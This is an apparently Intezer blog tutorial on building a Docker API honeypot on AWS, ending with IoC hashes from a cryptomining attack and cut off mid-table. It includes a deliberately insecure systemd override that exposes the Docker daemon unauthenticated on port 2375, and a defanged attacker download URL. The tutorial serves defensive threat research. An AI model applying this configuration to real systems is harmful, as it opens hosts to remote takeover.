&lt;h2&gt;What&amp;rsquo;s the Difference Between a High and Low Interaction Honeypot?&lt;span class="hx:absolute hx:-mt-20" id="whats-the-difference-between-a-high-and-low-interaction-honeypot"&gt;&lt;/span&gt;
&lt;a href="#whats-the-difference-between-a-high-and-low-interaction-honeypot" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Honeypots come in different tiers of interactivity. A low interaction honeypot is a honeypot that provides very limited access to the system, with just enough to log the initial request of an attack but no more. Usually, low interaction honeypots are just a network service that logs all requests coming into it.&lt;/p&gt;
&lt;p&gt;A high interaction honeypot is able to do much more. Rather than just providing an emulated service to probe, a high interaction honeypot provides a system for the attacker to perform post-exploitation activities on. This lets security researchers and malware analysts discover the tools and techniques that are being performed on the system after exploitation. This information is extremely valuable as it can bring to light emerging malware and campaigns targeting services hosted on the internet. A lot more IoCs and artifacts can be gathered this way, making intelligence stronger.&lt;/p&gt;
&lt;h2&gt;Setting up your Cloud Environment&lt;span class="hx:absolute hx:-mt-20" id="setting-up-your-cloud-environment"&gt;&lt;/span&gt;
&lt;a href="#setting-up-your-cloud-environment" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;The cloud is the perfect place to host your honeypot because it&amp;rsquo;s cheap, quick, and flexible. Many cloud providers offer a free tier that includes a free virtual machine or an allowance to spend on cloud resources. A virtual machine is a virtual computer that is able to be developed on a physical server through code. Virtual computers can easily host a service which can be used for the honeypot.&lt;/p&gt;
&lt;p&gt;For this tutorial, we will &lt;a href="https://docs.aws.amazon.com/efs/latest/ug/gs-step-one-create-ec2-resources.html"target="_blank" rel="noopener"&gt;create a virtual machine&lt;/a&gt; via the AWS console. Start by searching for the EC2 service in AWS. If you already have your infrastructure set up for your honeypot, you can skip this step.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/01/how-to-make-malware-honeypot/images/fig1.png" title="EC2 service in the Management Console." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;EC2 service in the Management Console.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Click Launch instance on the EC2 Dashboard. This will begin the process of setting up a virtual machine.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/01/how-to-make-malware-honeypot/images/fig2.png" title="Launch instance button is located on the dashboard." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Launch instance button is located on the dashboard.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;On the next page you will be presented with a number of Amazon Machine Images (AMI) and architecture options. These machine images are the software that will be used in the virtual machine, such as the operating system and applications.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/01/how-to-make-malware-honeypot/images/fig3.png" title="Amazon machine images to choose from." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Amazon machine images to choose from.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Let&amp;rsquo;s choose Amazon Linux 2. The next page you will be asked to choose the size of the instance type. This decides the amount of CPU cores and RAM your virtual machine will have and also the &lt;a href="https://aws.amazon.com/ec2/pricing/on-demand/"target="_blank" rel="noopener"&gt;price&lt;/a&gt;. There is a free tier option in AWS.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/01/how-to-make-malware-honeypot/images/fig4.png" title="Instance Type choices in AWS." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Instance Type choices in AWS.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Once you have decided on the size of the virtual machine, you will configure the instance and its networking. It&amp;rsquo;s best to add a name tag to help identify the instance and to configure your security group to only allow inbound SSH access from your router or VPN. This means that only you can access the SSH port while the wider internet will not be able to reach it. This way, you can test deploying your honeypot service without having it attacked before you are ready.&lt;/p&gt;
&lt;p&gt;To use just your own IP address, click the dropdown box under Source and choose My IP. This will place your own IP address into the field using a &lt;a href="https://en.wikipedia.org/wiki/Classless_Inter-Domain_Routing"target="_blank" rel="noopener"&gt;CIDR&lt;/a&gt; of 32, which restricts it to just that one IP.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/01/how-to-make-malware-honeypot/images/fig5.png" title="Security Group configuration." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Security Group configuration.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;This group will be changed later to expose your honeypot after it is set up. As you finish the configuration and click Launch at the review page, you will be prompted to choose a key pair for the SSH communication. A key pair is a set of asymmetric keys, usually &lt;a href="https://asecuritysite.com/rsa/"target="_blank" rel="noopener"&gt;RSA&lt;/a&gt;, that is used as a way to authenticate to the virtual machine over the internet. You can generate a new key pair quickly using the prompt and download the private key (.pem) to your computer.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/01/how-to-make-malware-honeypot/images/fig6.png" title="Creation of a new RSA key pair." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Creation of a new RSA key pair.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The instance will take a short time to boot. You will then see a lot of information about the machine, which includes its public IPv4 address. This is the address that will be used to reach the services set up:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2022/01/how-to-make-malware-honeypot/images/fig7.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;To SSH to the terminal, use the terminal in Mac/Linux, or use a SSH client like &lt;a href="https://www.putty.org/"target="_blank" rel="noopener"&gt;PuTTY&lt;/a&gt; for Windows. The command to SSH to your instance is:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;ssh -i [Path to RSA-Key] ec2-user@[Public IP]&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/01/how-to-make-malware-honeypot/images/fig8.png" title="SSH command to log into the EC2 instance." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;SSH command to log into the EC2 instance.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;If you set up the configuration properly, then you will be able to reach your virtual machine over SSH. Depending on how your permissions are configured on Mac and Linux machines, you &lt;a href="https://stackoverflow.com/questions/9270734/ssh-permissions-are-too-open-error"target="_blank" rel="noopener"&gt;might&lt;/a&gt; have to configure the permissions on the downloaded private key before use. Once you SSH into your machine, it&amp;rsquo;s time to set up the honeypot software.&lt;/p&gt;
&lt;h2&gt;Your Choice of Honeypot&lt;span class="hx:absolute hx:-mt-20" id="your-choice-of-honeypot"&gt;&lt;/span&gt;
&lt;a href="#your-choice-of-honeypot" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;It&amp;rsquo;s now time to decide your choice for the honeypot technology. First we want to highlight open-source honeypots that are the result of great work by the security community. A good resource to look at is the &lt;a href="https://github.com/paralax/awesome-honeypots"target="_blank" rel="noopener"&gt;GitHub&lt;/a&gt; page for &lt;a href="https://github.com/paralax/awesome-honeypots"target="_blank" rel="noopener"&gt;Awesome Honeypots&lt;/a&gt;. Awesome Honeypots is a curated list of open-source honeypots and honeypot management tools. It contains links to honeypot projects for popular applications and services such as databases, content management systems, and web applications.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/01/how-to-make-malware-honeypot/images/fig9.png" title="Awesome Honeypots on GitHub." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Awesome Honeypots on GitHub.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Many popular applications are covered in this list, especially other free and open-source software options for finishing your honeypot.&lt;/p&gt;
&lt;h2&gt;Setting Up Your Application&lt;span class="hx:absolute hx:-mt-20" id="setting-up-your-application"&gt;&lt;/span&gt;
&lt;a href="#setting-up-your-application" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Now, you need to set up the application that you will use as the honeypot. Approximatly 80% of honeypots are attacked within a day of them being set up according to a &lt;a href="https://www.scmagazine.com/brief/cloud-security/misconfigured-cloud-services-quickly-compromised"target="_blank" rel="noopener"&gt;report&lt;/a&gt; from Palo Alto Networks. You can set up any application that you want as the honeypot. This application could be an exposed version of software that your organization uses or develops. Any application can be attacked by threat actors. If you are unsure of what to deploy, below we outline how to deploy a simple honeypot application using Docker.&lt;/p&gt;
&lt;p&gt;A great way to deploy applications is through &lt;a href="https://docs.docker.com/get-started/overview/"target="_blank" rel="noopener"&gt;Docker&lt;/a&gt;. Docker is a platform that delivers software through images that are run in environments called containers. It is simple to deploy an application with Docker, but Docker itself can also be an application worth targeting. Let&amp;rsquo;s set up a honeypot using a misconfigured Docker API. &lt;a href="https://intezer.com/blog/container-security/fix-your-misconfigured-docker-api-ports/"target="_blank" rel="noopener"&gt;Misconfigured Docker APIs&lt;/a&gt; are a favorite for threat actors to target because of their simplicity to exploit to run malicious code. In order to misconfigure Docker, you need to install it first. This can be achieved very quickly on &lt;a href="https://docs.aws.amazon.com/AmazonECS/latest/developerguide/docker-basics.html"target="_blank" rel="noopener"&gt;Amazon Linux 2&lt;/a&gt;. Start by updating the installed packages on the instance.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;sudo yum update -y&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;Then, install the Docker Engine package.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;sudo amazon-linux-extras install docker&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;Next, start the Docker service.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;sudo service docker start&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;Add the user to the docker group so that you can execute Docker commands without the need for sudo.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;sudo usermod -a -G docker ec2-user&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;You will need to log out and log back in for the group changes to be picked up in your SSH terminal session. Now that Docker is installed and running, you can use it as a honeypot by misconfiguring the API. Let&amp;rsquo;s use the tutorial from &lt;a href="https://medium.com/@riccardo.ancarani94/attacking-docker-exposed-api-3e01ffc3c124"target="_blank" rel="noopener"&gt;here&lt;/a&gt;. Start by creating a file with the following content:&lt;/p&gt;
&lt;p&gt;File: &lt;code&gt;/etc/systemd/system/docker.service.d/override.conf&lt;/code&gt;&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;[Service]
ExecStart=
ExecStart=/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2375&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2022/01/how-to-make-malware-honeypot/images/fig10.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;This will configure the Docker daemon to listen for Docker Engine API requests on port 2375 over TCP. The default setting provides unauthenticated direct access to the Docker daemon, which means it can be exploited by attackers to run malicious code with ease. Once the file is created, reload the unit files and restart the Docker service by running the following commands:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;sudo systemctl daemon-reload
sudo systemctl restart docker.service&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;One can use netstat to confirm that the daemon is listening on port 2375.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2022/01/how-to-make-malware-honeypot/images/fig11.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;To check that your attack vector is working in a test environment, try to create a container remotely from your own terminal, outside the SSH tunnel. Start by reconfiguring the security group in AWS to allow inbound access to your API port from your router or VPN IP address.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/01/how-to-make-malware-honeypot/images/fig12.png" title="Edited security group to allow access to Docker API port." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Edited security group to allow access to Docker API port.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;You can test by running Docker commands from your terminal with the -H flag specifying the public IP address of the EC2 instance and the port of the Docker API.&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;pre&gt;&lt;code&gt;docker -H : info&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;You can also test by creating a container to test. We will run an Alpine container.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/01/how-to-make-malware-honeypot/images/fig13.png" title="Creation of a container from a remote system." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Creation of a container from a remote system.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/01/how-to-make-malware-honeypot/images/fig14.png" title="Docker image information." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Docker image information.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/01/how-to-make-malware-honeypot/images/fig15.png" title="Alert integration options." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Alert integration options.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h2&gt;You&amp;rsquo;ve Been Attacked! Now What?&lt;span class="hx:absolute hx:-mt-20" id="youve-been-attacked-now-what"&gt;&lt;/span&gt;
&lt;a href="#youve-been-attacked-now-what" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2022/01/how-to-make-malware-honeypot/images/fig16.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src="https://research.intezer.com/blog/2022/01/how-to-make-malware-honeypot/images/fig17.png" alt="" loading="lazy" /&gt;&lt;/p&gt;
&lt;p&gt;The above screen grab shows the first half of the malicious activity. Even though you can see in the alerts that the bash history was tampered with, you can still see all the events that have happened on the instance. Important information and a timeline of the attack can be gathered from the events listed here.&lt;/p&gt;
&lt;p&gt;Starting from the bottom and working our way up, we see that a new container image &lt;a href="https://hub.docker.com/r/docker72590/alpine/tags"target="_blank" rel="noopener"&gt;&lt;code&gt;docker72590/alpine:latest&lt;/code&gt;&lt;/a&gt; was executed. This container was documented in a blog by &lt;a href="https://www.lacework.com/blog/teamtnt-continues-to-target-exposed-docker-api/"target="_blank" rel="noopener"&gt;Lacework&lt;/a&gt; and it is from a group pretending to be the threat actor TeamTNT. Many files are executed, including creating SSH keys with the name TeamTNT. We can see that a bash script has been downloaded from &lt;code&gt;104.192.82[.]138//s3f1015/b/a.sh&lt;/code&gt;. This is a great place to start collecting IoCs. Now, let&amp;rsquo;s take a look at the Docker image that was executed. Go to your honeypot under Hosts and click on Images.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/01/how-to-make-malware-honeypot/images/fig18.png" title="Running containers on the honeypot." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Running containers on the honeypot.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/01/how-to-make-malware-honeypot/images/fig19.png" title="Malicious container code." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Malicious container code.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/01/how-to-make-malware-honeypot/images/fig20.png" title="XMRig Miner alert." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;XMRig Miner alert.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/01/how-to-make-malware-honeypot/images/fig21.png" title="Network and container details." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Network and container details.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/01/how-to-make-malware-honeypot/images/fig22.png" title="Genetic analysis of the cryptominer in Intezer Analyze." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Genetic analysis of the cryptominer in Intezer Analyze.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2022/01/how-to-make-malware-honeypot/images/fig23.png" title="Related samples based on shared code genes." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Related samples based on shared code genes.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h2&gt;Start Making Your Own Honeypot&lt;span class="hx:absolute hx:-mt-20" id="start-making-your-own-honeypot"&gt;&lt;/span&gt;
&lt;a href="#start-making-your-own-honeypot" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Try it for yourself. Honeypots are a powerful asset for any organization looking to harvest the power of threat intelligence. They can gather critical information, deceive attackers, and test the security configuration of cloud assets. Honeypots have a long history and an active community that creates &lt;a href="https://github.com/paralax/awesome-honeypots"target="_blank" rel="noopener"&gt;open-source honeypots&lt;/a&gt; and frameworks to help protect those hosting critical cloud assets.&lt;/p&gt;
&lt;h2&gt;IoCs Observed in this Honeypot&lt;span class="hx:absolute hx:-mt-20" id="iocs-observed-in-this-honeypot"&gt;&lt;/span&gt;
&lt;a href="#iocs-observed-in-this-honeypot" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;h3&gt;File Hashes&lt;span class="hx:absolute hx:-mt-20" id="file-hashes"&gt;&lt;/span&gt;
&lt;a href="#file-hashes" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Hash&lt;/th&gt;
&lt;th&gt;Malware Family&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;c64f7d22262caee9a8b59474ba1bd299b27332b9fb5fa30751c8caffe596fc29&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Coinminer&lt;/td&gt;
&lt;td&gt;Cryptominer&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;e03cf2af46ad1fe590e63f0020243c6e8ae94f074e65ace18c6d568283343dac&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;XMRig Miner&lt;/td&gt;
&lt;td&gt;Cryptominer&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;da3e84f5dc117cb8fb942e54839efe9fe847778d393cdac0d0d9ce9c1f548bfe&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Coinminer&lt;/td&gt;
&lt;td&gt;Cryptominer&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;9aaa27d3aa6bd327d0cb707250fba565372cc3678436043ee6a619842011dc43&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Coinminer&lt;/td&gt;
&lt;td&gt;Cryptominer&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;c0fd1716d95184b960a5141b1340f55be359bd9a9d56811cf0e1e38254cb6e69&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Masscan&lt;/td&gt;
&lt;td&gt;Port Scanning Tool&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;fb86120a4a1b13b29957eb5f95f7857cf9e469514fc20d25fad02ae87bf99091&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;XMRig Miner&lt;/td&gt;
&lt;td&gt;Cryptominer&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;8daa9b62df448daafe4c764f7b02253a91d3af4d0d2556861408d5e02a73fe22&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Miner Launcher&lt;/td&gt;
&lt;td&gt;Ensures the miners stay running&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;05e614cf49029d6fdff15c77909ff7d7109184fbad4434aba6248bfdbc2cfcf3&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Miner Launcher&lt;/td&gt;
